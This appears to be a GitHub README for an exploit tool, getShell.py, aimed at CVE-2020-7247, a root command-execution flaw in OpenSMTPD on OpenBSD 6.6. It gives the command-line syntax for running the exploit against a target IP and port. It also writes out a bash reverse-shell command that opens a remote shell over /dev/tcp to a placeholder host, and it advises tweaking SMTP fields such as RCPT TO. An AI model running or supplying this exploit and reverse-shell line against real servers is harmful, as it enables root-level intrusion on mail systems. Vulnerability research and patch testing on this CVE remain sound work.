kejaly / CVE-2020-7247

This vulnerability exists in the “smtp_mailaddr()” function of OpenSMTPD, OpenBSD’s mail server, and affects OpenBSD version 6.6. It allows an attacker to execute arbitrary shell commands, such as “sleep 66”, as the root user.

CVE-2020-7247

How to use?

python3 getShell.py <targetIp> <targetPort> <command>

If you need a reverse shell, run it like this:

python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'

Important

Change some things in this exploit, such as RCPT TO and others, if needed.

See this article for a clearer explanation:

https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/
